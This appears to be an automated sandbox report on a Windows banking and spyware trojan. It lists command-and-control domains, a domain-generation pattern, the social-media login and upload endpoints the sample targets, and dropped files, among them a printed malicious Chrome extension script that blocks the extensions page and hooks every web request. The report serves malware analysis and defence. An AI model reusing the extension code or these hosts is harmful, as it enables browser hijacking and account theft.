https://A5D4CE54CC78B3CA.xyz/	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/r	0%	Avira URL Cloud	safe
https://twitter.comsec-fetch-dest:	0%	Avira URL Cloud	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xy/info_old/w	0%	Avira URL Cloud	safe
http://ocsp.pki.goog/GTSGIAG30	0%	Avira URL Cloud	safe
http://84CFBA021A5A6662.xyz/	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	Avira URL Cloud	safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0#	0%	Avira URL Cloud	safe
http://84CFBA021A5A6662.xyz/info_old/ddd	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	Avira URL Cloud	safe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL	0%	Avira URL Cloud	safe
https://www.instagram.comsec-fetch-mode:	0%	Avira URL Cloud	safe
https://twitter.comReferer:	0%	Avira URL Cloud	safe
http://84CFBA021A5A6662.xyz/#y	0%	Avira URL Cloud	safe
http://www.interestvideo.com/video1.php	0%	Avira URL Cloud	safe
https://A5D4CE54CC78B3CA.xyz/t	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
84CFBA021A5A6662.xyz	104.21.23.16	true	false		unknown
84cfba021a5a6662.xyz	104.21.23.16	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://84cfba021a5a6662.xyz/info_old/g	false	Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xyz/info_old/e	false	Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xyz/info_old/w	false	Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xyz/info_old/r	false	Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xy/info_old/w	false	Avira URL Cloud: safe	unknown
http://84CFBA021A5A6662.xyz/info_old/ddd	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	ecv37E8.tmp.9.dr	false		high
https://duckduckgo.com/chrome_newtab	Localwebdata1611970737633.2.dr	false		high
https://duckduckgo.com/ac/?q=	6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	false		high
https://www.messenger.com/	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779	ecv37E8.tmp.9.dr	false		high
https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9	ecv37E8.tmp.9.dr	false		high
https://cvision.media.net/new/286x175/2/57/35/144/83ebc513-f6d1-4e0e-a39a-bef975147e85.jpg?v=9	ecv37E8.tmp.9.dr	false		high
http://www.msn.com	ecv37E8.tmp.9.dr	false		high
http://www.nirsoft.net	1611970727133.exe, 00000009.00000002.280160399.0000000000198000.00000004.00000010.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://A5D4CE54CC78B3CA.xyz/	6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/__media__/js/util/nrrV9140.js	ecv37E8.tmp.9.dr	false		high
https://twitter.com/ookie:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://twitter.comsec-fetch-dest:	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	ecv37E8.tmp.9.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852	ecv37E8.tmp.9.dr	false		high
http://ocsp.pki.goog/gts1o1core0	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/?ocid=iehp	ecv37E8.tmp.9.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	ecv37E8.tmp.9.dr	false		high
http://crl.pki.goog/GTS1O1core.crl0	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://www.messenger.com	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://www.nirsoft.net/	1611970727133.exe, 1611970727133.exe.2.dr	false		high
http://ocsp.pki.goog/GTSGIAG30	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://84CFBA021A5A6662.xyz/	6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://www.instagram.com/	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	download_engine.dll.2.dr	false		high
http://www.xunlei.com/GET	download_engine.dll.2.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	ecv37E8.tmp.9.dr	false		high
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c	ecv37E8.tmp.9.dr	false		high
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/origin:	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	ecv37E8.tmp.9.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	ecv37E8.tmp.9.dr	false		high
https://contextual.media.net/	ecv37E8.tmp.9.dr	false		high
http://ocsp.pki.goog/gsr202	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie	ecv37E8.tmp.9.dr	false		high
https://pki.goog/repository/0	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://api.twitter.com/1.1/statuses/update.json	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	ecv37E8.tmp.9.dr	false		high
http://www.msn.com/	ecv37E8.tmp.9.dr	false		high
https://upload.twitter.com/i/media/upload.json	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	N1yprTBBXs.exe, 00000000.00000002.268429575.0000000002C85000.00000004.00000040.sdmp, 6272167835D47591.exe, 00000002.00000003.287668875.0000000004150000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	ecv37E8.tmp.9.dr	false		high
https://twitter.com/compose/tweetsec-fetch-mode:	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://84CFBA021A5A6662.xyz/info_old/w	6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	false		unknown
https://www.messenger.com/accept:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	ecv37E8.tmp.9.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	ecv37E8.tmp.9.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/48/nrrV18753.js	ecv37E8.tmp.9.dr	false		high
http://crl.pki.goog/gsr2/gsr2.crl0?	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://84CFBA021A5A6662.xyz/info_old/g	6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	false		unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://feedback.googleusercontent.com	6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	false		high
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xunlei.com/	download_engine.dll.2.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0#	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingth	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	download_engine.dll.2.dr	false		high
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	ecv37E8.tmp.9.dr	false		high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js	ecv37E8.tmp.9.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf	ecv37E8.tmp.9.dr	false		high
https://duckduckgo.com/chrome_newtabH	6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp	false		high
https://curl.haxx.se/docs/http-cookies.html	6272167835D47591.exe, 00000002.00000002.353010517.00000000034BF000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280539335.000000000344F000.00000004.00000001.sdmp	false		high
http://www.openssl.org/support/faq.html	download_engine.dll.2.dr	false		high
https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:aut	ecv37E8.tmp.9.dr	false		high
http://www.winimage.com/zLibDllresource://scrollbar_u_h.pngresource://scrollbar_d_h.pngresource://sc	N1yprTBBXs.exe	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://www.instagram.comsec-fetch-mode:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/accounts/login/ajax/facebook/	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	ecv37E8.tmp.9.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	N1yprTBBXs.exe	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	ecv37E8.tmp.9.dr	false		high
https://www.instagram.com/sec-fetch-site:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://twitter.comReferer:	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://84CFBA021A5A6662.xyz/#y	6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.interestvideo.com/video1.php	6272167835D47591.exe, 00000004.00000002.280539335.000000000344F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/accept:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://A5D4CE54CC78B3CA.xyz/t	6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/login/nonce/	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9	ecv37E8.tmp.9.dr	false		high
https://srtb.msn.com/auction?a=de-ch&b=623d43496a394c99b1336ff5cc139eb9&c=MSN&d=http%3A%2F%2Fwww.msn	ecv37E8.tmp.9.dr	false		high
http://www.youtube.com	6272167835D47591.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.23.16	unknown	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	346123
Start date:	29.01.2021
Start time:	17:37:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	N1yprTBBXs.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal93.bank.troj.spyw.evad.winEXE@32/37@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 34.2% (good quality ratio 32.7%) Quality average: 82.3% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 58% Number of executed functions: 84 Number of non-executed functions: 311
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 23.211.6.115, 23.210.248.85, 51.11.168.160, 2.20.142.209, 2.20.142.210, 51.103.5.159, 51.104.139.180, 92.122.213.194, 92.122.213.247, 20.54.26.129, 52.155.217.156 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.23.16	Cyfj6XGbkd.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
84CFBA021A5A6662.xyz	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
84cfba021a5a6662.xyz	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	Royalmail-Shipment.xls	Get hash	malicious	Browse	172.67.1.225
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	Royalmail-Shipment.xls	Get hash	malicious	Browse	172.67.1.225
	PO#PDT28394209.exe	Get hash	malicious	Browse	172.67.176.199
	c8TrAKsz0T.exe	Get hash	malicious	Browse	104.21.47.75
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	RddH6rLRfH.exe	Get hash	malicious	Browse	104.21.27.240
	Immuni.apk	Get hash	malicious	Browse	172.64.100.5
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	UGPK60taH6.dll	Get hash	malicious	Browse	104.20.184.68
	4PDNbYK5fj.exe	Get hash	malicious	Browse	172.67.169.213
	pmTdQ57tvM.exe	Get hash	malicious	Browse	172.67.169.213
	7BtV39hziI.exe	Get hash	malicious	Browse	104.21.27.240
	dc4AaqW6Aa.exe	Get hash	malicious	Browse	104.21.27.240
	lAy87VNPiL.exe	Get hash	malicious	Browse	104.21.27.240
	97aa4Ywd9y.exe	Get hash	malicious	Browse	104.21.27.240
	wuRBlQt0Tz.exe	Get hash	malicious	Browse	172.67.169.213
	4GRuinub4a.exe	Get hash	malicious	Browse	172.67.169.213
	v8c1m9dW8G.exe	Get hash	malicious	Browse	172.67.169.213

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\MSI1983.tmp	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	N1yprTBBXs.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1611970726289 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.698304057893793
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
MD5:	3806E8153A55C1A2DA0B09461A9C882A
SHA1:	BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
SHA-256:	366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
SHA-512:	31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Cookies1611970737289 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.698304057893793
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
MD5:	3806E8153A55C1A2DA0B09461A9C882A
SHA1:	BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
SHA-256:	366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
SHA-512:	31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\background.js Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	886
Entropy (8bit):	5.022683940423506
Encrypted:	false
SSDEEP:	24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5:	FEDACA056D174270824193D664E50A3F
SHA1:	58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256:	8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512:	2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious:	false
Preview:	$(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\book.js Download File
